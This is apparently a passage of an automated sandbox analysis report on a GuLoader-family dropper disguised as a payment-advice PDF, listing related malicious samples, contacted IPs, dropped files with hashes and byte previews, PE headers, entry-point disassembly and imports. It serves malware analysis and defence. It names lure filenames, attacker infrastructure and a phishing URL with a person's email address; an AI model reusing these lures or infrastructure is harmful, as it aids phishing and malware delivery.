                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              37f463bf4616ecd445d4a1937da06e19bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              69633f.msiGet hashmaliciousVidarBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 142.250.200.225
                                                                                                              • 172.217.19.174
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dllPURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                                        O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):56641
                                                                                                                                  Entropy (8bit):1.2318917163845036
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                                  MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                                  SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                                  SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                                  SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):95190
                                                                                                                                  Entropy (8bit):4.6205617007906605
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:zaAMu1AwMzvOV9VU+er/vEt18Rl8hUNsF:za8hEAw+o/vEt18D8KS
                                                                                                                                  MD5:C666D5BD668E4E9BD4DC1D4359A19B1F
                                                                                                                                  SHA1:2CC942AFA039F22B19C741F262D928228C1CDD1C
                                                                                                                                  SHA-256:B5CDF16D8354827F1A281C7E5E7743FC60494040A049B391D0997B7D54BD026F
                                                                                                                                  SHA-512:5136AB06B982173E52D4621302826ACFEBDB261B388BA26C6845C9C7FB3808C85512DA2025E79231B21B7080959C625D930DDF5C96863D97CE402109ADD02462
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:..n............[......9.$$.`...66.........__.......................N.....................e..[......9.&..-........QQQ.......8..................... ...............t......zzzzzz.....E.i...d..5...Y......z.......%..........................p.........--..........................x............Z...h...g.hh."...SS..b.......OO.Z.......{................................Z................BBBBB..........uuu.{................33................uu......................,,.........ZZ.&.pppp......L......P......................................b._......RR........._.GG......NN...................I.........m................................L........$$$..zzzzzz........s._..H.....&...............ooo......t........................y.22......))....``..................K................X...........=......................................V........................NNN...................................r.............zzz...........w....uuuuuu..AAA....;.V....v.mm.0.b.................F...J.xxx....................................
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):345
                                                                                                                                  Entropy (8bit):4.241929841155785
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                                  MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                                  SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                                  SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                                  SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):210366
                                                                                                                                  Entropy (8bit):1.240975322465592
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                                  MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                                  SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                                  SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                                  SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):293684
                                                                                                                                  Entropy (8bit):7.703410579341344
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:ZSTn+i7Qz2n4X4rYJzri719zV8BoQM4w3wSNonLx6tv0EL:ZSTn+i7Qz2n4X4cXOD5J542wSidM
                                                                                                                                  MD5:67F6619D5C7D457E9DA47F86E3627FA2
                                                                                                                                  SHA1:0250A7635B60A177CE018CD34B5CEE61A8A81C46
                                                                                                                                  SHA-256:8182DF40F625C8A96CB493C6B642C6E391B50DB503A628AFF25B9161DDF0644B
                                                                                                                                  SHA-512:577F08A5305543EF1B4DCD28BB5819E0970FE2586A0D5B5149BF0FE11C57BE8EFFF6C6BECCEEDB5F168D5E9D048C40E4514487CF91DC80A2AEE0CF6D46902DAC
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\tropaeola.Tel, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.......mmm......PP.11...........gggg......................???.... ..........uuuuu.R.................$..6......j..9999..............AA..............>...i.```..........N.J..vvv...a.~.~~......}}............RR...ll....^.......Q............J...T.............S.....j........s....x...^^^........................Z.......tt.........................#...............................................CCC....{{{{.....7.^^^....N.y..===.>........00...........>..ll.................d.HH.................~........DDDDDD.............................!...........................{..............==.........A................r.....7...;.............VV......................++..........N.KKKKK........................p............a..HHH.99...\..........................W./.~~...............%%%.iii...............=._..||||..............V.............QQ.=.BB.....iii.....&&....II..........<....R.........................,,........`...}...............%%%%........G.......4.....................(..................................
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):363811
                                                                                                                                  Entropy (8bit):1.2512349423386382
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                                  MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                                  SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                                  SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                                  SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):11776
                                                                                                                                  Entropy (8bit):5.655335921632966
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                                  MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                                  SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                                  SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                                  SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1156
                                                                                                                                  Entropy (8bit):3.250976511083343
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DED/RKQ1olfW+kjcmAahTCN7:8xLDWLrFPjPL9izZMspdqy
                                                                                                                                  MD5:DA3120C581FD7369156BF3B9B82815B5
                                                                                                                                  SHA1:12B60059AE6BCFFFADEB2D4BDD2B4000E5295362
                                                                                                                                  SHA-256:5EA5E2BC538A59AA6F16F46991007F577B6EA4B456D42CBBDCF25EAB84FFA971
                                                                                                                                  SHA-512:B65020A6B78960BED204A4F4C39BEE4BD43E28349DB8D61C91788D6600E89204DFFB4D9087434D8A924994C04C8C36F2A3D69563FDA8AE1D34A333F017AC2FD6
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.O.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.............y.............>.e.L.:..er.=y....
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.96302159927424
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  File size:471'469 bytes
                                                                                                                                  MD5:34dcd76e7a002a5f19d9842a70ba5c87
                                                                                                                                  SHA1:188373e893907df10ccf54559d05b6bb98ccdcf4
                                                                                                                                  SHA256:360acac9133b07ab36c79af7aa5e46850a97a297696bc812bfd25c4415ce4449
                                                                                                                                  SHA512:e59230ce8bd6758653642b1eba48d88e3ef3da670b466fdf8ccebf5ccba57f04084f663a529df29e6e9ee2e378930b6a5a970843cba3f57cc63eecd44140ef93
                                                                                                                                  SSDEEP:12288:I5AekxiEheb3HhIt06wEu7Jj1JK8s5FEeK4:Z1Z0Cu7Jj1Jiced
                                                                                                                                  TLSH:55A423196AB1A2E3E5371A340D33BFBE62397701DB65CD2393241E0E7E227925C3B945
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                                  Icon Hash:3d2e0f95332b3399
                                                                                                                                  Entrypoint:0x4032a0
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                                  Instruction
                                                                                                                                  sub esp, 000002D4h
                                                                                                                                  push ebp
                                                                                                                                  push esi
                                                                                                                                  push 00000020h
                                                                                                                                  xor ebp, ebp
                                                                                                                                  pop esi
                                                                                                                                  mov dword ptr [esp+0Ch], ebp
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                  call dword ptr [004080B0h]
                                                                                                                                  call dword ptr [004080ACh]
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  je 00007FF2E881D153h
                                                                                                                                  push ebp
                                                                                                                                  call 00007FF2E8820296h
                                                                                                                                  cmp eax, ebp
                                                                                                                                  je 00007FF2E881D149h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  push ebx
                                                                                                                                  push edi
                                                                                                                                  push 0040A2F4h
                                                                                                                                  call 00007FF2E8820213h
                                                                                                                                  push 0040A2ECh
                                                                                                                                  call 00007FF2E8820209h
                                                                                                                                  push 0040A2E0h
                                                                                                                                  call 00007FF2E88201FFh
                                                                                                                                  push 00000009h
                                                                                                                                  call 00007FF2E8820264h
                                                                                                                                  push 00000007h
                                                                                                                                  call 00007FF2E882025Dh
                                                                                                                                  mov dword ptr [00434F04h], eax
                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [004082A8h]
                                                                                                                                  mov dword ptr [00434FB8h], eax
                                                                                                                                  push ebp
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  push 000002B4h
                                                                                                                                  push eax
                                                                                                                                  push ebp
                                                                                                                                  push 0042B228h
                                                                                                                                  call dword ptr [0040818Ch]
                                                                                                                                  push 0040A2C8h
                                                                                                                                  push 00433F00h
                                                                                                                                  call 00007FF2E881FE4Ah
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  mov ebx, 0043F000h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  call 00007FF2E881FE38h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                  RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                                  RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                                                  RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                  RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                                                  RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                  RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                  RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                                                  RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                                                  RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
